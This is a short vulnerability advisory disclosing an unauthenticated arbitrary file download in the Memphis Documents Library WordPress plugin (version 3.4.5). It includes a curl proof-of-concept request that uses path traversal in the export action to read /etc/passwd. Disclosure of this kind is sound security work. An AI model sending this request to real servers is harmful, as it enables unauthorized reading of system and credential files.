Memphis Documents Library [Unauthenticated Arbitrary File Download]

Description

Plugin Memphis Documents Library registers the AJAX action myajax-submit which provides a convenient way to execute many of the plugin’s functionalities. Nearly all of them that are provided by this hook, lack of proper input validation, capabilities checks, output escaping etc.

At least one of the functionalities that are provided by this AJAX action can be used to download arbitrary files from the server.

PoC

curl 'http://sbwp2.dev/wp-admin/admin-ajax.php' \
    -d 'action=myajax-submit&type=mdocs-export&zip-file=/../etc/passwd'

---

WordPress Plugins Unauthenticated Arbitrary File Download Arbitrary File Download

---

INFO

• 2 June 2016
• Pan Vag
• profiles.wordpress.org
• Memphis Documents Library
• 3.4.5
• WordPress 4.5.2
• DWF-2016-87053